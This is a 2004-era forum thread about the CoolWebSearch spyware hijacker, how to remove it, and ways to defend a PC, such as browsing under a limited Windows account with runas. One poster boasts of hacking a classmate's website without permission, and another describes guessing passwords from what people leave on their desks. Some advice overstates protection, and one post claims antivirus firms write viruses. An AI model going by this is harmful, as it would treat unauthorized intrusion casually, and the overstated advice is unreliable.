Alright, everyone needs to stay away from anything called CoolWebSearch, or anything with a name close to that, such as coolsearch.biz. It's a trojan/hijacker that bad websites install without telling you. I just spent 2 days trying to get rid of that s.hit, and I think I've finally gotten it. Hopefully. My only loss was that Windows Media Player had to be deleted.

CWS is a pain. There are over 30 varities of it, and new versions are coming out faster than with any other piece of malware (at least that's what I heard).

Ad-aware doesn't pick it up, and neither does SpyBot, or virus scans.

If you happen to get it, you need to first run CWShredder, which is a program designed to help remove all known versions of it. Some versions of CWS cause CWShredder to shut down, but the latest version of CWShredder can counter that.

Anyway, while looking through my registry and other places, I also found the following trojans:

a.exe
optimize.exe (not optimizer.exe, which is something different)
Bridge

Hopefully I've gotten them all removed.

I also had help from Hijack This.

So, if you ever open IE and your homepage has been replaced by "cool search dot biz" or something like that, just be aware that you're probably in for annoying crap.

Note: I wrote cool search dot biz so it wouldn't appear as a URL, and so no one would click on it.

CWS Chronicles (http://www.spywareinfo.com/%7Emerijn/cwschronicles.html) <-- article about how much CWS sucks (by the author of CWShredder), and also links to CWShredder and other info if you need it.

Good luck.

IronFist,

I quickly clicked on to this thread because I thought you had some worriesome info on condoms.

mickey

dude, you gotta stop clicking all over the place like your system is a big click fest!

you need to create some message rules in your email client so you are not getting the spam attachments that send you these malicious programs.

you need to be more wary of free software and the people who manufacture it.

rule of thumb, if it sounds to good to be true, then it is. There is no free lunch.

also, ease off on the porn sites man. get a magazine or something, it's safer. And don't put your email address all over the internet where the bots can harvest it and send you even more spam and malicious code!

cheers

My biggest thing is someone keeps hacking into my Netzero account, and sending viruses to people. I've changed the password 3 times in the last 2 weeks, and it still keeps hapening.

I contacted Netzero again this morning, we will see what happenes.

KL,
sounds like you have a key logger hidden on your hard drive.

actually mk, i have never used av software and i don't intend to.

if you know even a little about it, you don't need it.

I am of the opinion that the av comps are the ones who are the worst offenders and proliferators of viruses.

why would they do this? well, to stay in business and keep getting gajillions of dollars off of people who think it's ok to open every dang attachment they get simply becausethey think it's from some one they know.

people prey on stupid people. THat is the number one mark of the marketer. They believe that most people are dumb and frankly they are correct and through their lack opf ethics and morals and the entrenchment of capitalist ideals, they don't have a problem with shearing the sheep.

Bottom line is. Be careful. The only safe computer is the one that is totally OFF a network. most people would be completely stunned at how simple the process of hacking is. A little information is a dangerous thing. Knowledge is power and don't think for one minute that someone out there has the goods on you and you gave it to them through your computer and what you keep on it.

lol, suckers, HaX04z 400L J00

Originally posted by Kung Lek

Bottom line is. Be careful. The only safe computer is the one that is totally OFF a network. most people would be completely stunned at how simple the process of hacking is.

social engineering works too, so zero network connection does not necessarily insure safety.

The simple act of opening e-mail can be troublesome these day. avoiding MSIE and its "features" can save you a lot of griefs.

http://www.theinquirer.net/?article=14908

Hotmail, Yahoo flummoxed by Filter flaw
Allows the bad guys in

By INQUIRER staff: Wednesday 24 March 2004, 08:10
FILTERS IN Yahoo Mail and Hotmail allows hackers to steal passwords, access mail and generally cause all sorts of naughtiness, it is alleged.

Computer security firm GreyMagic discovered the glitch at the beginning of the month and released an advisory about it yesterday.

According to a GreyMagic rep, Yahoo and Hotmail screen all HTML content as it pours through a pipeline into its servers in a bid to stop damaging scripts scarring the processes.

GreyMagic techies, apparently, have worked out a way to bypass such filters.

The cross-site scripting flaw uses an Achilles' Heel in a site's security to send potentially harmful commands flying around all over the place.

GreyMagic said it had used Internet Explorer "features" to demonstrate the defect. µ

Originally posted by Kung Lek
dude, you gotta stop clicking all over the place like your system is a big click fest!

"Click fest" is funny cuz it sounds dirty, but it isn't.

Or is it? :D

:eek:


you need to create some message rules in your email client so you are not getting the spam attachments that send you these malicious programs.

It wasn't from email. It was installed by some stupid website.


you need to be more wary of free software and the people who manufacture it.

Yeah. I didn't install anything that I knew about. It was installed by some website without my knowledge.


rule of thumb, if it sounds to good to be true, then it is. There is no free lunch.

rule of thumb, s.hita.ss websites install things without telling you.


also, ease off on the porn sites man

But! But...

I mean.

Hah. Porn sites? What's that?

I never put my email address on a website. If I do, it's like userXXname@doXXmain.com and then I tell people to remove the X's.

I don't think that AV companies are the ones who write the viruses in the first place. Can you imagine the legal implications of doing something like that? Especially for a major company like Norton or Mcafee. There are enough idiots out there who write viruses to keep them in business for a long time.

AV products don't work that well anyway. I've tried them all so far and none have detected or prevented the dozens of spywear/adware that got installed on my system. They only seem to catch email viruses/trojans, which are easy to avoid anyway. If your dumb enough to open an attachment with an extension like .exe.pif.scr.vbe then you shouldn't be on the internet in the first place.

Spyware that gets installed on your system by simply viewing a website is the major problem these days. Most common offendors are serial/crack sites and some porn sites. This happens due to security issues in Micro$oft's IE. I've formatted my computer and istalled all the patches and now it seems to be ok. Haven't been getting any more spyware lately, but I'm sure those l33t h3x0r$ will come up with something new.

A firewall such as TPF can be a pretty good defense against spyware. Most of the time it won't stop it from being installed but it will alert you when it tries to open a socket for communication over the internet at which point you can deny it access and take the necessary steps to remove it. Firewalls are only as good as the people running them though, and for most they're just a hassle and often get turned off or disabled for convenience. Not much can be done against ignorance.

Another good defence, which I posted in another thread, is to have a separate user account with limited privilages (i.e. not an admin or power user account). With this account you would only have write access to files in users My Documents and Shared Files folders. Any virus/trojan/spyware would inherit the same user rights and would not be able to install itself in your system files or registry since it doesn't have access. You could use this account whenever your using the internet/email/kazaa and login as admin when you're offline to install/manage your system.

I'm not sure how strongly Windows XP enforces this policy but if it's even half decent, it should work. It's the principle behind all *nix distros.

Edit: ****, sorry for long post. i get carried away with these things.

Trojan warning:

The ribs go on the OUTSIDE!

Ask me no questions, just trust me on this one.

Originally posted by Chang Style Novice
The ribs go on the OUTSIDE! [/B]

I agree.

Anyway, I've done a bit more research and found out about the runas command which allows to to run an application as any user regardless of who you are logged in as. This has great potential.

You can have your normal Admin account (say: admin) which you always login as and also create a 'Limited' account (say: lim)which HAS a password (do not leave blank).

This way you can login to windows as always and have full access rights with the admin account. However, when you want to surf the net, check mail or start any other potentially unsecure apps, you can use the runas command to start that app with the Limited user account (so that it can't cause any harm to your system).

For example, you're logged in as admin and want to go on the inernet to browse for some porn which could be potentially dangerous for reasons other than going blind. What you do is you go to Start->Run and type:

runas /env /u:username iexplore

Replace username with the limited user account (in this case, lim). A DOS shell will popup asking for the password (can't be blank). Type the password, press enter and iexplore comes up. Try navigating to your C:\ drive and deleting some files. You will notice that it won't let you, since the user running iexplore doesn't have access rights. When a trojan/spyware tries to install itself on your system it will have the same problem. You are now VIRUS IMMUNE!

This might be a good solution but it's still a bit of a hassle going through all that. It would be better to create a shortcut which you could simply double click and it would open iexplore in 'safe mode'. Problem with this is that the runas command needs the user to input the password interactivelly, i.e. you can't pass it as a commandline argument. Hence you would have to enter the password every time you start the app.

Fortunately I found a solution to this. There is an application on the internet called Runas Proffesional which you can use as a replacement for the builtin runas command.

http://www.mast-computer.com/c_9-l_en.html

Using this application you can create a RAP file with the application path, username and password which when double-clicked will simply run the target app in 'safe mode' as required. Change the icon of the RAP file, place it on your desktop, call it IExplore and you won't be able to tell the difference from before.

You should have a very high level of protection now. Any virus/trojan/whatever will only be able to delete/modify files in the users My Documents and Shared Documents folders. Nothing else.

I have to do a bit more research to find out how application spawned processes behave (i.e. you run IE in 'safe mode', but then you click on Outlook. Is Outlook also running in 'safe mode'?). Also need to find out if there are any loopholes allowing a trojan to bypass the user restrictions impossed on it (maybe running as a 'system' process). If Windows is even half decent, this method would make your computer immune to a lot of viruses. Just make RAP shortcuts for IExplore, Outlook, Kazaa, MSN and whatever. I've only tested this with IExplore so far. Some pre winXP apps might not run properly under a non-admin user. However, IE and Outlook should be safe.

Originally posted by WanderingMonk


social engineering works too, so zero network connection does not necessarily insure safety.

The simple act of opening e-mail can be troublesome these day. avoiding MSIE and its "features" can save you a lot of griefs.

http://www.theinquirer.net/?article=14908

Hotmail, Yahoo flummoxed by Filter flaw
Allows the bad guys in

By INQUIRER staff: Wednesday 24 March 2004, 08:10
FILTERS IN Yahoo Mail and Hotmail allows hackers to steal passwords, access mail and generally cause all sorts of naughtiness, it is alleged.

Computer security firm GreyMagic discovered the glitch at the beginning of the month and released an advisory about it yesterday.

According to a GreyMagic rep, Yahoo and Hotmail screen all HTML content as it pours through a pipeline into its servers in a bid to stop damaging scripts scarring the processes.

GreyMagic techies, apparently, have worked out a way to bypass such filters.

The cross-site scripting flaw uses an Achilles' Heel in a site's security to send potentially harmful commands flying around all over the place.

GreyMagic said it had used Internet Explorer "features" to demonstrate the defect. µ

Not only social engineering, but everyday human carelessness. Before moving to web development, I was a network admin... I can't count how many times I saw people's passwords taped onto their desk, PC, etc. people would take papers with passwords on them, not shred them and just toss them in the trash. If you can gain access to an office, chances are, you can get a password.

Also, many common users will create passwords based on things like address, maiden name, pet's name, etc. Things that you can commonly find info about at their desk, in their garbage can, etc. you can start putting together possible password lists merely by snooping around their area and finding out a little about them.

I used to run l0pht crack on a regular basis, just to see how long it took to crack the passwords. It was shocking how weak they were.

lol, when I was in college, there was a guy in a web development class. his final project was to create a website about the topic of his choice - he chose hackers. (his teacher gave him an F because she hated hackers, wtf?) Anyway, I found his site and figured it would be cool to hack a site about hackers. So I got it and changed it up a bit, then sent him an email letting him know to strengthen his password.

Originally posted by Royal Dragon
My biggest thing is someone keeps hacking into my Netzero account, and sending viruses to people. I've changed the password 3 times in the last 2 weeks, and it still keeps hapening.

I contacted Netzero again this morning, we will see what happenes.

you dont need a password to send out emails form an account. i cna write a program that sends from your account without logging into it.

Really??

How do I keep these goons from doing this then?

How do I keep these goons from doing this then?

a) find them a girlfriend

b) introduce them to a little place called "outside"

c) nothing

Originally posted by Kung Lek


a) find them a girlfriend

b) introduce them to a little place called "outside"

c) nothing


d.) tell them thier N30hax4j00 is a stupid name and show them how to get a real life. or just sign them up for Queer eye for the straight guy.